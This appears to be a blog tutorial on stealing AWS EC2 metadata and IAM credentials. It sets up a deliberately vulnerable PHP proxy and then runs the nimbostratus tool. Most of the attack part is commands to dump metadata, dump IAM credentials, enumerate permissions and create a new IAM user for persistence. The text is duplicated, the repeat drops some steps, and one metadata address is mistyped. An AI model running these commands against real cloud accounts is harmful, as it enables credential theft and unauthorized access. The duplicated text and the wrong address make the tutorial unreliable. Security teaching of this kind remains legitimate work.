Introduction:
Metadata server: Every EC2 instance has some user scripts which can be used to pull configuration to launch that EC2 instance. Those configs are stored on a Metadata server (169.254.169.254) 'private' to that Ec2 instance. Each time an Ec2 instance starts , AWS attached the " meta data server" to it, which can be accessed from the instance itself using http://169.254.168.254. The instance meta-data stores information such as :AMIid, Private IP address, Instance Type etc...and...
User-data: OS boot scripts:
AWS allows you to boot up the EC2 using a custom User-data scripts- such as web application, Apache web server, keys. credentials etc. This script, also called user data, is stored by AWS in the instance metadata and retrieved by the OS during boot.
Instance profile:
When EC2 instance wants to access other services such as S3, it uses credentials to access it. Instance profiles give Ec2 instances a way to access AWS services. AWS creates a unique set of credentials for that EC2 instance/ instance profile and makes them available through meta-data stored on the meta-data server.
Exploiting meta-data:
This represents a risk when, because of a vulnerability, an attacker is able to proxy HTTP GET requests through the EC2 instance which allows him to retrieve the user data script from the meta data . In other words,if there is a way for the attacker to ask any of the services running on the instance to perform an HTTP GET request to arbitrary URLs and then return the HTTP response body to the attacker, then he would get access to the repository URL, branch and SSH keys allowing him to access the application source. The most common vulnerability that allows this type of access is a PHP Remote File Include but any other vulnerable software which allows HTTP proxying could be used to retrieve the metadata too
In this example we'll be using a tool called 'nimbostratus' (http://andresriancho.github.io/nimbostratus/) release in Black Hat by andresriancho.
======
Let's host a web application AWS EC2 instance with the above vulnerability.
======
1. Launch an EC2 instance:
2. ssh to the EC2 machine:
3. Install a web server such as Apache:
4. and php:
5. Once Apache installed, go to the below path:
6. Mention the public IP and port of the EC2, so that it's accessible on internet:
7. Restart the web server by using command: sudo /usr/sbin/apachectrl restart
8. No we'll download a vulnerable php script (greenido’s php proxy script) which allows us to, when exploited as mentioned above, access the meta data from meta data server. Go to the path /var/www/html:
9. Let's access the script in a browser. The greenido’s php script has an ‘url’ parameter which will contain the URL to be connected through the proxy. Perfect!
=====
Let's install the tool 'nimbostratus' as follows:
git clone git@github.com:andresriancho/nimbostratus.git
cd nimbostratus
pip install -r requirements.txt
Now, we are ready with a vulnerable EC2 instance which will act as a target for our demonstration.
Nimbostratus has a python file called mangle.py inside the core -> utils folder which has to be updated with the target URL.
=====
Time for action!
./nimbostratus -v dump-ec2-metadata --mangle-function=core.utils.mangle.mangle
A lot of juicy information extracted:
Here onward we can run the below commands:
To dump IAM credentials:
./nimbostratus -v dump-credentials --mangle-function=core.utils.mangle.mangle
Check the permission associated with the IAM credentials:
./nimbostratus dump-permissions --access-key=
We can create new IAM user too depending on the permissions:
./nimbostratus -v create-iam-user --access-key= --secret-key= --token
Rest from here on imagination....!
Reference: http://andresriancho.github.io/nimbostratus/
Metadata server: Every EC2 instance has some user scripts which can be used to pull configuration to launch that EC2 instance. Those configs are stored on a Metadata server (169.254.169.254) 'private' to that Ec2 instance. Each time an Ec2 instance starts , AWS attached the " meta data server" to it, which can be accessed from the instance itself using http://169.254.168.254. The instance meta-data stores information such as :AMIid, Private IP address, Instance Type etc...and...
User-data: OS boot scripts:
AWS allows you to boot up the EC2 using a custom User-data scripts- such as web application, Apache web server, keys. credentials etc. This script, also called user data, is stored by AWS in the instance metadata and retrieved by the OS during boot.
Instance profile:
When EC2 instance wants to access other services such as S3, it uses credentials to access it. Instance profiles give Ec2 instances a way to access AWS services. AWS creates a unique set of credentials for that EC2 instance/ instance profile and makes them available through meta-data stored on the meta-data server.
Exploiting meta-data:
This represents a risk when, because of a vulnerability, an attacker is able to proxy HTTP GET requests through the EC2 instance which allows him to retrieve the user data script from the meta data . In other words,if there is a way for the attacker to ask any of the services running on the instance to perform an HTTP GET request to arbitrary URLs and then return the HTTP response body to the attacker, then he would get access to the repository URL, branch and SSH keys allowing him to access the application source. The most common vulnerability that allows this type of access is a PHP Remote File Include but any other vulnerable software which allows HTTP proxying could be used to retrieve the metadata too
In this example we'll be using a tool called 'nimbostratus' (http://andresriancho.github.io/nimbostratus/) release in Black Hat by andresriancho.
======
Let's host a web application AWS EC2 instance with the above vulnerability.
======
1. Launch an EC2 instance:
3. Install a web server such as Apache:
8. No we'll download a vulnerable php script (greenido’s php proxy script) which allows us to, when exploited as mentioned above, access the meta data from meta data server. Go to the path /var/www/html:
9. Let's access the script in a browser. The greenido’s php script has an ‘url’ parameter which will contain the URL to be connected through the proxy. Perfect!
=====
Let's install the tool 'nimbostratus' as follows:
git clone git@github.com:andresriancho/nimbostratus.git
cd nimbostratus
pip install -r requirements.txt
Now, we are ready with a vulnerable EC2 instance which will act as a target for our demonstration.
Nimbostratus has a python file called mangle.py inside the core -> utils folder which has to be updated with the target URL.
=====
Time for action!
./nimbostratus -v dump-ec2-metadata --mangle-function=core.utils.mangle.mangle
A lot of juicy information extracted:
Here onward we can run the below commands:
To dump IAM credentials:
./nimbostratus -v dump-credentials --mangle-function=core.utils.mangle.mangle
Check the permission associated with the IAM credentials:
./nimbostratus dump-permissions --access-key=
We can create new IAM user too depending on the permissions:
./nimbostratus -v create-iam-user --access-key=
Rest from here on imagination....!
Reference: http://andresriancho.github.io/nimbostratus/
Comments